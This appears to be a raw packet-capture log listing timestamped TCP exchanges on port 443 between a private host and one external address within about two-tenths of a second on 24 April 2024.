Apr 24, 2024 07:32:48.344202995 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.344211102 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.344233990 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.346719027 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.346741915 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.346779108 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.346792936 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.346807003 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.348623991 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.348645926 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.348685980 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.348694086 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.348715067 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.351373911 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.351397038 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.351471901 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.351480961 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.353494883 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.353524923 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.353569031 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.353575945 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.353594065 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.356137991 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.356168985 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.356199980 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.356209040 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.356224060 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.358114004 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.358153105 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.358170986 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.358177900 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.358194113 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.358208895 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.360836029 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.360881090 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.360893965 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.360902071 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.360930920 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.362945080 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.362982988 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.363006115 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.363014936 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.363029003 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.363045931 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.382646084 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.382678032 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.382716894 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.382728100 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.382744074 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.384680033 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.384716034 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.384825945 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.384825945 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.384836912 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.386665106 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.386720896 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.386729002 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.386744022 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.386790991 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.386800051 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.388519049 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.388555050 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.388571024 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.388578892 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.388611078 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.390867949 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.390902996 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.390925884 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.390933037 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.390949965 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.392916918 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.392956972 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.392973900 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.392980099 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.393011093 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.394686937 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.394718885 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.394751072 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.394758940 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.394773960 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.396603107 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.396636963 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.396653891 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.396661043 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.396687984 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.398811102 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.398844957 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.398869038 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.398876905 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.398900986 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.400782108 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.400842905 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.400855064 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.400913954 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430341005 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430351019 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.430386066 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.430453062 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.430510998 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430521965 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.430608988 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430614948 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.430625916 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.430663109 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430663109 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430663109 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430663109 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430670977 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.430743933 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430743933 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.430780888 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.431833982 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.431874037 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.431890965 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.431900024 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.431915998 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.434001923 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.434036970 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.434051037 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.434079885 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.434501886 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.434505939 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.434556961 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.436011076 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.436043978 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.436064959 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.436072111 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.436085939 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.437472105 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.437506914 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.437520027 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.437527895 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.437556982 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.439853907 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.439891100 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.439908028 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.439914942 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.439929008 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.439940929 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.441483021 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.441520929 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.441539049 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.441550016 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.441572905 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.443378925 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.443432093 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.443440914 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.443468094 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.443519115 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.443527937 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.445385933 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.445437908 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.445447922 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.445466042 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.445518017 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.445527077 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.447740078 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.447767973 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.447797060 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.447807074 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.447819948 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.449276924 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.449331045 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.449340105 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.449362993 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.449413061 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.449420929 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.451169014 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.451199055 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.451221943 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.451231003 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.451248884 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.452994108 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.453030109 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.453047991 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.453054905 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.453093052 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.454777002 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.454812050 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.454853058 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.454862118 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.456504107 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.456541061 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.456557989 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.456564903 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.456578970 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.456602097 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.458565950 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.458596945 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.458633900 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.458642006 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.458657026 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.466907978 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.466989994 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.466991901 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.467015982 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.467056036 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.467911959 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.467945099 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.467976093 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.467983961 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.467998028 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.468836069 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.468871117 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.468890905 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.468898058 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.468910933 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.468928099 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.469894886 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.469928026 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.469948053 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.469955921 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.469969988 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.469999075 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.471178055 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.471230030 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.471268892 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.471324921 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.471940041 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.471976995 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.471992970 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.472001076 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.472028971 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.473031998 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.473073006 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.473082066 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.473088980 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.473124981 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.474188089 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.474220991 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.474246979 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.474255085 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.474281073 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.475513935 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.475548983 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.475573063 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.475579977 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.475598097 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.477178097 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.477207899 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.477235079 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.477241993 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.477262020 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.478916883 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.478950977 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.478971958 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.478979111 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.478996038 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.480868101 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.480895042 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.480923891 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.480931044 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.480962992 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.480983019 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.480993032 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.481000900 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.481000900 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.481013060 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.482100964 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.482139111 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.482156992 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.482163906 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.482194901 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.484045029 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.484076023 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.484118938 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.484126091 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.484147072 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.485814095 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.485853910 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.485871077 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.485877991 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.485913038 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.487577915 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.487615108 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.487642050 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.487648964 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.487663984 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.489521027 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.489557981 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.489579916 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.489588976 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.489605904 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.490695000 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.490747929 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.490757942 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.490767002 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.490801096 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.492654085 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.492702007 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.492712975 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.492719889 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.492760897 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.494560957 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.494599104 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.494631052 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.494637012 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.494652987 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.497183084 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.497219086 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.497256994 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.497266054 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.497282982 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.498317957 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.498349905 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.498373985 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.498383045 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.498399019 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.499994040 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.500029087 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.500063896 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.500071049 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.500094891 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.501085043 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.501126051 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.501143932 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.501151085 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.501168013 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.502291918 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.502335072 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.502346039 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.502353907 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.502393007 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.503669024 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.503709078 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.503726006 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.503732920 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.503748894 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.505506992 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.505543947 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.505561113 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.505568027 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.505583048 CEST	49166	443	192.168.2.22	172.67.215.45
